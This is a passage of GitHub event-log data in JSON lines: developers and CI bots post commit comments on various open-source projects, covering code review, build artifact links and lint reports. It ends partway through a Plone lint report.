{"id":"7921877448","type":"CommitCommentEvent","actor":{"login":"JingyaoLi"},"repo":{"name":"daseECNU/Touchstone"},"payload":{"comment":{"id":29603427,"position":null,"line":null,"path":null,"commit_id":"599919609ff0841e7635bf914cf97140ee0b292f","created_at":"2018-07-05T09:00:44Z","updated_at":"2018-07-05T09:00:44Z","author_association":"NONE","body":"您好~能解释一下约束链中三类约束的基本数据结构的含义嘛~比如， num1 is the identifier that can join, num2 is the identifier that can not join。这个num1和num2的意思不太能理解。还有FKJoin节点中的probability的含义又是什么？\r\n期待您的回复~\r\n\r\n"}},"created_at":"2018-07-05T09:00:44Z"}
{"id":"7921878668","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29603429,"position":null,"line":null,"path":null,"commit_id":"6e27fb4ad87bb8a8128eac04b2f34bda6356c657","created_at":"2018-07-05T09:00:58Z","updated_at":"2018-07-05T09:00:58Z","author_association":"CONTRIBUTOR","body":"yeah, I know it now, I hope I will not do it anymore... \r\nthanks for caring of 'pifpaf'!"}},"created_at":"2018-07-05T09:00:58Z"}
{"id":"7921880052","type":"CommitCommentEvent","actor":{"login":"jtnord"},"repo":{"name":"jenkinsci/rocketchatnotifier-plugin"},"payload":{"comment":{"id":29603434,"position":14,"line":38,"path":"pom.xml","commit_id":"0194817e43b38d1ad224c439ef66ac6dd287146d","created_at":"2018-07-05T09:01:12Z","updated_at":"2018-07-05T09:01:12Z","author_association":"MEMBER","body":"this is illegal to deploy to a maven repo (and causes issues).\r\nIf you want to have a -beta version then change the (properties are invalid in `groupId`/`artifactId` and `version` when deployed to a repository) (see [Maven Flatten Plugin](https://www.mojohaus.org/flatten-maven-plugin/) if you want to have this locally and yet still deploy to a repo and have it correctly consumable.\r\nChanging the artifact is also a very strange thing to do, the version is the normal to change (see [Maven CI Friendly Version](https://maven.apache.org/maven-ci-friendly.html))"}},"created_at":"2018-07-05T09:01:12Z"}
{"id":"7921880661","type":"CommitCommentEvent","actor":{"login":"Jaifroid"},"repo":{"name":"kiwix/kiwix-js"},"payload":{"comment":{"id":29603435,"position":31,"line":75,"path":"www/js/lib/xzdec_wrapper.js","commit_id":"adda5f9ba9b7dc73908103ff7bea384dc93515ed","created_at":"2018-07-05T09:01:18Z","updated_at":"2018-07-05T09:01:18Z","author_association":"COLLABORATOR","body":"@mossroy Clever! My problem when I inserted the code in zimfile was that I think I was sending another slice before this _release function had happened. I didn't see this code because I was trying to do everything in zimfile -- I'm glad you found a good low-level point to indicate that the decompressor has released its handle. This is precisely what I was missing."}},"created_at":"2018-07-05T09:01:18Z"}
{"id":"7921881988","type":"CommitCommentEvent","actor":{"login":"vierfuffzig"},"repo":{"name":"ArduPilot/ardupilot_wiki"},"payload":{"comment":{"id":29603440,"position":null,"line":null,"path":null,"commit_id":"282d21e19346b30e6d2e2c13a7774277692e0172","created_at":"2018-07-05T09:01:32Z","updated_at":"2018-07-05T09:01:32Z","author_association":"CONTRIBUTOR","body":"yes, thought i had that but likely messed that up too. fixed now, thanks everybody for your patience and help!"}},"created_at":"2018-07-05T09:01:32Z"}
{"id":"7921884459","type":"CommitCommentEvent","actor":{"login":"kserjey"},"repo":{"name":"kserjey/react-aqueduct"},"payload":{"comment":{"id":29603445,"position":null,"line":null,"path":null,"commit_id":"2e609cd56552f05d0e3ad7ae032e2bfba82f50a0","created_at":"2018-07-05T09:01:59Z","updated_at":"2018-07-05T09:01:59Z","author_association":"OWNER","body":"Related to #7 "}},"created_at":"2018-07-05T09:01:59Z"}
{"id":"7921889448","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.contenttypes"},"payload":{"comment":{"id":29603451,"position":null,"line":null,"path":null,"commit_id":"b8d39ea7533a41bd62e5348c5265a23692c417da","created_at":"2018-07-05T09:02:53Z","updated_at":"2018-07-05T09:02:53Z","author_association":"NONE","body":"Markus Hilbert your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-05T09:02:53Z"}
{"id":"7921891171","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29603453,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T09:03:12Z","updated_at":"2018-07-05T09:03:12Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux 32|Linux 64|macOS 64|\n|---|---|---|---|\n|Blender py36|[ifcblender-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)|[ifcblender-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[ifcblender-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[IfcConvert-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)|[IfcConvert-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[IfcConvert-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[IfcGeomServer-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)|[IfcGeomServer-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[IfcGeomServer-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[ifcopenshell-python-27-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)|[ifcopenshell-python-27-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[ifcopenshell-python-27-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[ifcopenshell-python-27u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)|[ifcopenshell-python-27u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[ifcopenshell-python-27u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[ifcopenshell-python-32-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)|[ifcopenshell-python-32-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[ifcopenshell-python-32-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[ifcopenshell-python-32u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)|[ifcopenshell-python-32u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[ifcopenshell-python-32u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[ifcopenshell-python-33-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)|[ifcopenshell-python-33-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[ifcopenshell-python-33-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[ifcopenshell-python-34-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)|[ifcopenshell-python-34-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[ifcopenshell-python-34-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[ifcopenshell-python-35-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)|[ifcopenshell-python-35-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[ifcopenshell-python-35-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[ifcopenshell-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)|[ifcopenshell-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[ifcopenshell-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T09:03:12Z"}
{"id":"7921895963","type":"CommitCommentEvent","actor":{"login":"DidierSpaier"},"repo":{"name":"brailcom/speechd"},"payload":{"comment":{"id":29603457,"position":null,"line":null,"path":null,"commit_id":"ecd75ffe1bcb7fe69cd7fc349a989c59bb2e498d","created_at":"2018-07-05T09:03:59Z","updated_at":"2018-07-05T09:03:59Z","author_association":"NONE","body":"Looks could. I still get in pico.log:\r\n\r\nThu Jul  5 11:00:14 2018 [231018]: picoCannot create a new pico engine (-13): name undefined: voice definition voix par défaut pico\r\n\r\nBut I hear a (French) voice."}},"created_at":"2018-07-05T09:03:59Z"}
{"id":"7921896843","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29603459,"position":null,"line":null,"path":null,"commit_id":"6b42c96331423d8390ba003ab08e83c5dc6f8db1","created_at":"2018-07-05T09:04:08Z","updated_at":"2018-07-05T09:04:08Z","author_association":"CONTRIBUTOR","body":"哈哈哈哈你体会到“没过脑子”是什么感觉了"}},"created_at":"2018-07-05T09:04:08Z"}
{"id":"7921896962","type":"CommitCommentEvent","actor":{"login":"toots"},"repo":{"name":"savonet/liquidsoap"},"payload":{"comment":{"id":29603460,"position":null,"line":null,"path":null,"commit_id":"7333b2c6397c27f848f61e6afc75e1a5a68e6efa","created_at":"2018-07-05T09:04:09Z","updated_at":"2018-07-05T09:04:09Z","author_association":"MEMBER","body":"Yeah, at least that's what user Per Gunnarsson said he's done it with liquidsoap.\r\n\r\n"}},"created_at":"2018-07-05T09:04:09Z"}
{"id":"7921902553","type":"CommitCommentEvent","actor":{"login":"kronn"},"repo":{"name":"hitobito/hitobito_sbv"},"payload":{"comment":{"id":29603471,"position":21,"line":22,"path":"app/controllers/song_censuses_controller.rb","commit_id":"571d117a6da0f27b919e190f5e8720b4229dbd88","created_at":"2018-07-05T09:05:07Z","updated_at":"2018-07-05T09:05:07Z","author_association":"MEMBER","body":"Siehe https://github.com/hitobito/hitobito_sbv/commit/b5e7a68413f9f96b0cb7b14050e330712a5279bb"}},"created_at":"2018-07-05T09:05:07Z"}
{"id":"7921903683","type":"CommitCommentEvent","actor":{"login":"kronn"},"repo":{"name":"hitobito/hitobito_sbv"},"payload":{"comment":{"id":29603474,"position":47,"line":52,"path":"app/controllers/song_censuses_controller.rb","commit_id":"571d117a6da0f27b919e190f5e8720b4229dbd88","created_at":"2018-07-05T09:05:18Z","updated_at":"2018-07-05T09:05:18Z","author_association":"MEMBER","body":"ich würde es am liebsten via dry_crud lösen, dann können wir diese Methode einfach entfernen, weil das schon in der Basisklasse vorhanden ist. Zusammen mit einigen anderen methoden. Es würde vieles vereinfachen. Im ersten Anlauf habe ich das nicht hinbekommen, ich schaue mal, dass ich das so umsetzen kann, das es weniger custom-code enthält."}},"created_at":"2018-07-05T09:05:18Z"}
{"id":"7921905727","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29603481,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-05T09:05:39Z","updated_at":"2018-07-05T09:05:39Z","author_association":"NONE","body":"@aksr I'll have another look. Thanks!\r\n\r\n> One that comes to mind is `sqtroff` (from the '90s), but I think it is probably long gone.\r\n\r\nOh wow, I've never heard of that before. :| Going by an [old mailing list thread](https://lists.gnu.org/archive/html/groff/2002-02/msg00120.html), it seems `sqtroff` users were hard to come by even in 2002. It also seems to use a [different output language](http://www.tug.org/tetex/html/fontfaq/cf_110.html) than `ditroff`... It'd be interesting to find a reference, let alone somebody who still has access to it. I wish I knew more.\r\n\r\n> That AIX troff looks to be a very old version of ditroff, judging by the [online man page](https://www.ibm.com/support/knowledgecenter/en/ssw_aix_72/com.ibm.aix.cmds5/troff.htm). I can only imagine a very limited use for it these days.\r\n\r\nAye, I imagine the only people using AIX troff are AIX customers themselves (who knows if they have a `groff` port available)."}},"created_at":"2018-07-05T09:05:39Z"}
{"id":"7921907215","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29603490,"position":38,"line":63,"path":"BZOJ/3626.cpp","commit_id":"761383ad0883b7f570a3ad322e19a8c6631c9053","created_at":"2018-07-05T09:05:55Z","updated_at":"2018-07-05T09:05:55Z","author_association":"CONTRIBUTOR","body":"What's the point?\r\n\r\n仅仅是要有style？\r\n\r\n不过我也经常这么干……"}},"created_at":"2018-07-05T09:05:55Z"}
{"id":"7921910416","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29603494,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-05T09:06:30Z","updated_at":"2018-07-05T09:06:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T09:06:30Z"}
{"id":"7921911063","type":"CommitCommentEvent","actor":{"login":"mgsweet"},"repo":{"name":"longjj/MineCube"},"payload":{"comment":{"id":29603495,"position":32,"line":35,"path":"include/Gui.hpp","commit_id":"fe5a457ba60db81013b0dd5ac8dcbf6b5fbdfbce","created_at":"2018-07-05T09:06:37Z","updated_at":"2018-07-05T09:06:37Z","author_association":"COLLABORATOR","body":"ok"}},"created_at":"2018-07-05T09:06:37Z"}
{"id":"7921911888","type":"CommitCommentEvent","actor":{"login":"Niall7459"},"repo":{"name":"savonet/liquidsoap"},"payload":{"comment":{"id":29603499,"position":null,"line":null,"path":null,"commit_id":"7333b2c6397c27f848f61e6afc75e1a5a68e6efa","created_at":"2018-07-05T09:06:46Z","updated_at":"2018-07-05T09:06:46Z","author_association":"NONE","body":"Very nice.\r\n\r\nShame I have to wait 24 hours to do a live stream after verifying my phone number :/"}},"created_at":"2018-07-05T09:06:46Z"}
{"id":"7921917166","type":"CommitCommentEvent","actor":{"login":"Lejou"},"repo":{"name":"JunshengFu/tracking-with-Extended-Kalman-Filter"},"payload":{"comment":{"id":29603509,"position":null,"line":null,"path":null,"commit_id":"98c872d72f2ef51766a93c3ea1e4b727e6226bf0","created_at":"2018-07-05T09:07:45Z","updated_at":"2018-07-05T09:07:45Z","author_association":"NONE","body":"Nice to meet you, Dr Fu. i am the new to study kalman filter, and I have a project which will use EKF. I really appreciate your code to help me understand the process of KF.But there is something confusing me when you calculate the jacobian matrix(src/tools.cpp; line 76). How and why it was calculated in this way?I really need help and I do appreciate if you reply. "}},"created_at":"2018-07-05T09:07:45Z"}
{"id":"7921917630","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29603511,"position":99,"line":1120,"path":"lib/elixir/lib/code.ex","commit_id":"32450a0fd9db0a0a1e4f582b7a812aa3304f3fe8","created_at":"2018-07-05T09:07:50Z","updated_at":"2018-07-05T09:07:50Z","author_association":"MEMBER","body":"Good point. I will go ahead and make this change."}},"created_at":"2018-07-05T09:07:50Z"}
{"id":"7921920693","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29603515,"position":8,"line":8,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-05T09:08:24Z","updated_at":"2018-07-05T09:08:24Z","author_association":"OWNER","body":"я подумал что тут поезда должны выдаваться по запросу пользователя по типу и тут я теперь понимаю что ведь к станций\r\nТИП вообще отношения не имеет) "}},"created_at":"2018-07-05T09:08:24Z"}
{"id":"7921921417","type":"CommitCommentEvent","actor":{"login":"Martinj98"},"repo":{"name":"SupaHotFiya-Security/curcon-backend"},"payload":{"comment":{"id":29603517,"position":158,"line":27,"path":"src/main/resources/authorisatie.sql","commit_id":"d3c346a65ecabb66678558d5e3bfdc1f5e3af7bc","created_at":"2018-07-05T09:08:32Z","updated_at":"2018-07-05T09:08:32Z","author_association":"NONE","body":"+(13, 'cohortcohortcursus_delete'),moet zijn :(13, 'cohortcursus_delete')"}},"created_at":"2018-07-05T09:08:32Z"}
{"id":"7921923234","type":"CommitCommentEvent","actor":{"login":"HoGil2"},"repo":{"name":"HoGil2/text_game_java"},"payload":{"comment":{"id":29603519,"position":null,"line":null,"path":null,"commit_id":"9b38c52e171dec0725e558bfd8161b6090e2e353","created_at":"2018-07-05T09:08:54Z","updated_at":"2018-07-05T09:08:54Z","author_association":"OWNER","body":"It's my first codes without other people codes."}},"created_at":"2018-07-05T09:08:54Z"}
{"id":"7921925515","type":"CommitCommentEvent","actor":{"login":"Niall7459"},"repo":{"name":"savonet/liquidsoap"},"payload":{"comment":{"id":29603523,"position":null,"line":null,"path":null,"commit_id":"7333b2c6397c27f848f61e6afc75e1a5a68e6efa","created_at":"2018-07-05T09:09:19Z","updated_at":"2018-07-05T09:09:19Z","author_association":"NONE","body":"Also @toots do you know how I can add text to the video output or image at a specified location..\r\n(e.g not at the bottom scrolling)"}},"created_at":"2018-07-05T09:09:19Z"}
{"id":"7921925760","type":"CommitCommentEvent","actor":{"login":"matze"},"repo":{"name":"ufo-kit/ufo-core"},"payload":{"comment":{"id":29603524,"position":null,"line":null,"path":null,"commit_id":"519e38f776dd8fc33e79fae7b558706654866c94","created_at":"2018-07-05T09:09:21Z","updated_at":"2018-07-05T09:09:21Z","author_association":"CONTRIBUTOR","body":"Holy Vim is my guardian!"}},"created_at":"2018-07-05T09:09:21Z"}
{"id":"7921926395","type":"CommitCommentEvent","actor":{"login":"OrkhanAlikhanov"},"repo":{"name":"CosmicMind/Material"},"payload":{"comment":{"id":29603525,"position":29,"line":420,"path":"Sources/iOS/TabsController.swift","commit_id":"a741f921c4275d6799f67b16e07546490cddc594","created_at":"2018-07-05T09:09:28Z","updated_at":"2018-07-05T09:09:28Z","author_association":"MEMBER","body":"Nope, everything is OK now!"}},"created_at":"2018-07-05T09:09:28Z"}
{"id":"7921927963","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29603526,"position":47,"line":79,"path":"BZOJ/3626.cpp","commit_id":"761383ad0883b7f570a3ad322e19a8c6631c9053","created_at":"2018-07-05T09:09:45Z","updated_at":"2018-07-05T09:09:45Z","author_association":"CONTRIBUTOR","body":"这里如果`g++`的warning配置好的话，编译器应该是会报warning的。这样就不容易造出一个随机数发生器：)\r\n\r\n```bash\r\nMain.cpp: In function ‘void build(int, int, int)’:\r\nMain.cpp:79:20: warning: missing initializer for member ‘node::f’ [-Wmissing-field-initializers]\r\n  tr[k]=(node){l,r,0};\r\n                    ^\r\n```"}},"created_at":"2018-07-05T09:09:45Z"}
{"id":"7921931988","type":"CommitCommentEvent","actor":{"login":"sthibaul"},"repo":{"name":"brailcom/speechd"},"payload":{"comment":{"id":29603535,"position":null,"line":null,"path":null,"commit_id":"ecd75ffe1bcb7fe69cd7fc349a989c59bb2e498d","created_at":"2018-07-05T09:10:31Z","updated_at":"2018-07-05T09:10:31Z","author_association":"COLLABORATOR","body":"Sure, that's the Orca side of the bug: Orca shouldn't be sending such Orca-specific string to speech dispatcher."}},"created_at":"2018-07-05T09:10:31Z"}
{"id":"7921937227","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29603549,"position":null,"line":null,"path":null,"commit_id":"89c95ef04ecdc13336b18eb263039f6c82c2487d","created_at":"2018-07-05T09:11:30Z","updated_at":"2018-07-05T09:11:30Z","author_association":"OWNER","body":"TEST\nBlaBla\n```Code?```"}},"created_at":"2018-07-05T09:11:30Z"}
{"id":"7921944387","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29603555,"position":null,"line":null,"path":null,"commit_id":"89c95ef04ecdc13336b18eb263039f6c82c2487d","created_at":"2018-07-05T09:12:45Z","updated_at":"2018-07-05T09:12:45Z","author_association":"OWNER","body":"TEST\nBlaBla\n```Code?```\n@daid HELLO!"}},"created_at":"2018-07-05T09:12:45Z"}
{"id":"7921947217","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29603563,"position":99,"line":149,"path":"BZOJ/3626.cpp","commit_id":"761383ad0883b7f570a3ad322e19a8c6631c9053","created_at":"2018-07-05T09:13:16Z","updated_at":"2018-07-05T09:13:16Z","author_association":"CONTRIBUTOR","body":"都8102年了，输出调试用点别的可以区分的东西。\r\n\r\n不然你时间紧张的时候来不及删完调试输出！\r\n\r\n如果你全部用一个identifier来标识调试输出（比如我就用`cout`），在vim下`n`+`dd`有奇效[滑稽]"}},"created_at":"2018-07-05T09:13:16Z"}
{"id":"7921952650","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29603577,"position":20,"line":20,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-05T09:14:17Z","updated_at":"2018-07-05T09:14:17Z","author_association":"OWNER","body":"я хотел возвращать все поезда на станций находящиеся в текущий момент, а аргументом являлся имя станций, посчитал что обращение через имени станций будет правильнее, так как он укажет из какой станций возвращать поезда\r\n"}},"created_at":"2018-07-05T09:14:17Z"}
{"id":"7921953756","type":"CommitCommentEvent","actor":{"login":"g0110280"},"repo":{"name":"UniSharp/laravel-filemanager"},"payload":{"comment":{"id":29603586,"position":4,"line":36,"path":"docs/installation.md","commit_id":"54c73c70150d28c0db9ea190b8cff8c92390b151","created_at":"2018-07-05T09:14:29Z","updated_at":"2018-07-05T09:14:29Z","author_association":"MEMBER","body":"My bad. This part is a feature in v2.0 . I should keep instructions for v1 on the document as well."}},"created_at":"2018-07-05T09:14:29Z"}
{"id":"7921955287","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29603593,"position":4,"line":2,"path":"lecture1/src/main/resources/config.properties","commit_id":"cd3a82cf5ff4491de47267df12debf8e0330b134","created_at":"2018-07-05T09:14:47Z","updated_at":"2018-07-05T09:14:47Z","author_association":"NONE","body":"Нет) должно быть в итоге ./questions.csv Если необходимо читать, как из файла, то есть замечательный getReqourceAsStream"}},"created_at":"2018-07-05T09:14:47Z"}
{"id":"7921956162","type":"CommitCommentEvent","actor":{"login":"xvik"},"repo":{"name":"xvik/gradle-animalsniffer-plugin"},"payload":{"comment":{"id":29603596,"position":14,"line":74,"path":"src/main/groovy/ru/vyarus/gradle/plugin/animalsniffer/signature/BuildSignatureTask.groovy","commit_id":"c16b00aff5c4db48313fd571ba4bcd85e649393c","created_at":"2018-07-05T09:14:57Z","updated_at":"2018-07-05T09:14:57Z","author_association":"OWNER","body":"You are right, I can initialize it with `project.files()` for default empty collection instead of internal api usage. Thank you! \r\nBut I can't make it finial because it's conventional property. Besides, such configuration would be a redundant complication for users: `task.files = ... ` is much clearer\r\n\r\nIn general, I understand the danger of internal apis, but it is almost impossible to not use internal apis in gradle. I'm trying to avoid them, but often can't. For example, at the same class I have `ConventionTask` and `IsolatedAntBuilder`..."}},"created_at":"2018-07-05T09:14:57Z"}
{"id":"7921958420","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29603600,"position":null,"line":null,"path":null,"commit_id":"86ffa0ee29b1b379c060990f2868bb15d6ad95e9","created_at":"2018-07-05T09:15:21Z","updated_at":"2018-07-05T09:15:21Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/20/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove 